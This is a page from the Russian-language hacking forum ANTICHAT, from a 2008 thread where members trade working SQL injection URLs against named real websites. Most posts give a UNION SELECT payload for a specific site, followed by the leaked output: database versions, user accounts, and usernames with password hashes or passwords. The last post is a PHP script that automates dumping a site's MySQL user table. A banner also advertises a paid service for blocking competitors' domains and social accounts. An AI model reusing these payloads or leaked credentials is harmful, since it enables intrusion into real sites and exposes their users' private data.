ANTICHAT.XYZ

VIDEO.ANTICHAT.XYZ

НОВЫЕ СООБЩЕНИЯ

ФОРУМ

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
SQL Инъекции

Страница 540 из 1239

540

Опции темы

Поиск в этой теме

Опции просмотра

20.05.2008, 13:40

Dr.Frank

Постоянный

Регистрация: 31.07.2002

Сообщений: 312

Провел на форуме:
1212427

Репутация: 187

Отправить сообщение для Dr.Frank с помощью ICQ

Закладки:

Код:

http://www.social-bookmarks.ru/?item_id=99999999999999+union+select+1,convert(concat(database(),0x09,user(),0x09,version())+using+cp1251),3,4+limit+0,1--

20.05.2008, 14:18

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

http://www.rededular.com.br/catalogo-sec.php?codcat=3&codsec=-60+uni on+select+1,2,3,4,5,6,table_name,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1+from+infor mation_schema.tables+lim it+1,1/*

version:5.0.22
user:rededular@localhost
database : rededular

ну а дальше все зависит от вашей фантазии

20.05.2008, 19:20

Mr. P.S.

Участник форума

Регистрация: 27.05.2007

Сообщений: 237

Провел на форуме:
2256445

Репутация: 767

heavymetalsociety.org

Код:

http://www.heavymetalsociety.org/interview.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6/*

4.1.22standard:heavymet@localhost:heavymet_hmssite

Код:

http://www.heavymetalsociety.org/interview.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6+from+users+limit+1,1/*

Первые 10 юзеров:
duncang:f02937159a1e31d72c7114bfe2d83015::renegades: - админ
Sanitarium:44a4dc99148a7577f78578177202dd7b:::
Colm C:eb95fc1ab8251cf1f8f870e7e4dae54d::megadeth:
The Noonster:f1a81d782dea6a19bdca383bffe68452::spider:
apoc:a25e01bddca85cdf4a4a3dafdd3aaa05::apoc:
Decrepit:2ccd23d1cd0f95dc6984215a1f1b31ca::sludge:
GravesOfYourMother:594bca3f02fc8fcfe8133ce01b4e3f4 3::graves:
Retorzio:fea1804c38c3e141e51894528967c4dc:::
Tsunekuni:597cee5b6e97930735991ad87fd423bc:::
Vagina Squasher:aa2d6e4f578eb0cfaba23beef76c2194::free:

Последний раз редактировалось Mr. P.S.; 20.05.2008 в 19:22..

20.05.2008, 21:47

Momiji

Постоянный

Регистрация: 25.08.2007

Сообщений: 530

Провел на форуме:
3926698

Репутация: 1446

Отправить сообщение для Momiji с помощью ICQ

best49.eu

Код:

http://www.best49.eu/index.php?cat=-1+union+select+1,concat_ws(0x3,version(),user(),database()),3/*

4.1.22-standardbest49e_user1@localhostbest49e_best49

Код:

http://www.best49.eu/index.php?cat=-1+union+select+1,concat(username,0x3,passwd),3+from+users/*

webmastertest
b490ubgjhmix
b49101gtarqlud

21.05.2008, 00:16

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

http://www.posugf.com.br/site_2008/curso.php?ID_Curso=-103+uni on+select+1,2,3,4,5--

version : 4.1.13-Debian_0.dotdeb.1-log
user : sistema@192.168.0.254
database: sistema_homologacao

21.05.2008, 00:41

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

http://www.nelore.com/fazendas/luzz/novo/galeria_conteudo.php?areaid=-1+union+select+1,ta ble_name,3,4,5,6 ,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+f rom+information_schema.tables+limit+28,1/*

http://www.nelore.com/fazendas/luzz/novo/galeria_conteudo.php?areaid=-1+union+select+1,column_name,3,4 ,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+ information_schema.columns+where+table_name=0x6162 637a5f7573756172696f+limit+1,1/*

http://www.nelore.com/fazendas/luzz/novo/galeria_conteudo.php?areaid=-1+union+select+1,concat_ws(0x3a,no me,0x3a,email,0x3a,senha,0x3a,login),3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0+from+abcz_usuario+limit+0,1/*

version :5.0.27-community-nt-log
user: nelore1@localhost
database: nelore1

ЗЫ Мне очень не нравится когда после того как я выложил на ачат скулю, какой нибудь киндер быстренько дефейснет сайт...выкладывать админку не буду.. уж извините.Всего доброго !

Последний раз редактировалось Gorev; 21.05.2008 в 00:45..

21.05.2008, 01:23

Momiji

Постоянный

Регистрация: 25.08.2007

Сообщений: 530

Провел на форуме:
3926698

Репутация: 1446

falconleader.eu

Код:

http://www.falconleader.eu/index.php?cat=1&id=2&pid=-1+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12/*

5.0.27fiorano@dedik-192.nebula.fifiorano

Код:

http://www.falconleader.eu/index.php?cat=1&id=2&pid=-1+union+select+1,concat(name,0x3,passw),3,4,5,6,7,8,9,10,11,12+from+users/*

Sampsa346a55ca940cea871ae30d7c605c0b8a

21.05.2008, 14:00

КВР

Познающий

Регистрация: 23.04.2008

Сообщений: 39

Провел на форуме:
198086

Репутация: 135

openworld.gov
_http://www.openworld.gov/article/print.php?id=1 and 1=1
_http://www.openworld.gov/article/print.php?id=1 and 1=2

Последний раз редактировалось КВР; 21.05.2008 в 14:02..

21.05.2008, 15:05

Ded MustD!e

Members of Antichat - Level 5

Регистрация: 23.08.2007

Сообщений: 417

Провел на форуме:
14324684

Репутация: 3908

http://www.fromthetop.org/

PR:6

Код:

http://www.fromthetop.org/Programs/Performers.cfm?pid=-1+union+select+1,2,concat(user,0x3a,password),4,5,6,7+from+mysql.user/*

root:*CF57A666D82A1A6E307947399943403DD93CF490

#10

21.05.2008, 15:17

КВР

Познающий

Регистрация: 23.04.2008

Сообщений: 39

Провел на форуме:
198086

Репутация: 135

Выводит всю базу .

PHP код:


		
			
<?  

 echo "<pre>\n";  

 @set_time_limit(0);  

 @ini_set("display_errors","0");  

 $hostname = gethostbyname('fromthetop.org');  

 function from($from)  

 {  

  global $hostname;  

  $responce = "";  

  $fsock    = fsockopen($hostname,80,$errnum,$errstr,2);  

  $headers  = "GET hhttp://www.fromthetop.org/Programs/Performers.cfm?pid=-1+union+select+1,2,concat(user,0x3a,password),4,5,6,7+from+$from/* HTTP/1.1\n";  

  $headers .= "Host: my-photo.ru\n";  

  $headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";  

  $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";  

  $headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n";  

  $headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n";  

  $headers .= "Keep-Alive: 500\n";  

  $headers .= "Connection: close\n";  

  $headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";  

  fwrite   ($fsock,$headers);  

  while    (!feof($fsock)) $responce .= fread($fsock,1024);   

  fclose   ($fsock);  

 $patern = "#<[\s]*sqlinj[\s]*>([^<]*)<[\s]*/sqlinj[\s]*>#i";  

 if(preg_match($patern, $responce, $rez)) echo $rez[1]; else echo 'Something not right...';  

//echo $responce;  

}  

from("mysql.user");  

echo "</pre>";  

?>